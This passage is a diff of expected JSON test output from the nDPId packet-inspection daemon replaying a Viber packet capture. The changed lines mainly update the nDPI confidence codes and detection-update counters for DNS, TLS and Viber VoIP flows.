{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639005,"flow_last_seen":1527155639008,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":261,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35283,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Advertisement"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155646819,"flow_last_seen":1527155646840,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":35331,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641574,"flow_last_seen":1527155641691,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":37418,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155638474,"flow_last_seen":1527155638476,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":45743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155670632,"flow_last_seen":1527155677899,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.32","src_port":45424,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155671066,"flow_last_seen":1527155672061,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7577,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"54.187.91.182","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155685529,"flow_last_seen":1527155685530,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":50097,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1527155679411,"flow_last_seen":1527155685088,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":4410,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7985,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155679411,"flow_last_seen":1527155679443,"flow_idle_time":200000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":38190,"dst_port":7987,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1527155646850,"flow_last_seen":1527155680789,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":972,"flow_tot_l4_payload_len":6977,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"172.217.23.78","src_port":43702,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155648481,"flow_last_seen":1527155648506,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":181,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":44376,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155639234,"flow_last_seen":1527155639237,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":62872,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1527155679410,"flow_last_seen":1527155685132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"18.201.4.3","src_port":33744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} -00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","packets-captured":440,"packets-processed":435,"total-skipped-flows":0,"total-l4-payload-len":125733,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":24,"total-detection-updates":17,"total-updates":0,"current-active-flows":1,"total-active-flows":27,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":171,"global_ts_msec":1648954023554} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1527155641813,"flow_last_seen":1527155641840,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1648952183755,"l3_proto":"ip4","src_ip":"192.168.0.17","dst_ip":"192.168.0.15","src_port":40445,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Viber","breed":"Acceptable","category":"Chat"}} 
+00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","packets-captured":440,"packets-processed":435,"total-skipped-flows":0,"total-l4-payload-len":125733,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":24,"total-detection-updates":19,"total-updates":0,"current-active-flows":1,"total-active-flows":27,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":173,"global_ts_msec":1648954023554} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648954023554,"flow_last_seen":1648954023554,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1648954023554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1648954023554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648954023554,"pkt":"eJS0JASgYDjgxTWgCABFAAA86GpAAD8GYELAqAJkNAD8AqDgFHo59lPMAAAAAKAC\/\/81EwAAAgQFtAQCCArXUgVsAAAAAAEDAwk="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1648954023662,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1648954023662,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAAOwGm6w0APwCwKgCZBR6oOA1qzY9OfZTzaASaN\/krwAAAgQFrAQCCApiDhmE11IFbAEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1648954023691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1648954023691,"pkt":"eJS0JASgYDjgxTWgCABFAAA06GtAAD8GYEnAqAJkNAD8AqDgFHo59lPNNas2PoAQAKx7IAAAAQEICtdSBfViDhmE"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648954023554,"flow_last_seen":1648954023697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1648954023697,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
-00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":446,"total-skipped-flows":0,"total-l4-payload-len":126273,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":25,"total-detection-updates":17,"total-updates":0,"current-active-flows":2,"total-active-flows":28,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":177,"global_ts_msec":1648968035683} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1648954023554,"flow_last_seen":1648954023697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":6,"midstream":0,"thread_ts_msec":1648954023697,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} +00562{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":446,"total-skipped-flows":0,"total-l4-payload-len":126273,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":25,"total-detection-updates":19,"total-updates":0,"current-active-flows":2,"total-active-flows":28,"total-idle-flows":26,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":179,"global_ts_msec":1648968035683} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":1648968035683,"pkt":"eJS0JASgYDjgxTWgCABFAACU2kpAAD8GpwLAqAJkLMDKSqeUEJTyP2Q6cEHfOoAYAVdrNwAAAQEICphN6aPkLWTjYAAuDuoU\/P8DgFkAGwAAAAAAAAAuDuoUyCWY+Eiv3vNvHuU8izmtmd1xLKgDGQAAAC4GaTctzm2TgBHTuz9kkBDO3BN0gtQM11m3wPtySAu5MwDtuOA\/BIT7TjIAAaAP"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1648954023554,"flow_last_seen":1648954024107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":516,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.2","src_port":41184,"dst_port":5242,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1648952182644,"flow_last_seen":1648952183755,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3518,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"52.0.252.145","src_port":48690,"dst_port":4244,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} -00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","packets-captured":451,"packets-processed":447,"total-skipped-flows":0,"total-l4-payload-len":126369,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":26,"total-detection-updates":17,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":184,"global_ts_msec":1648968035683} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"viber.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648968035683,"flow_last_seen":1648968035683,"flow_idle_time":7580000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1648968035683,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"44.192.202.74","src_port":42900,"dst_port":4244,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Viber","breed":"Acceptable","category":"VoIP"}} 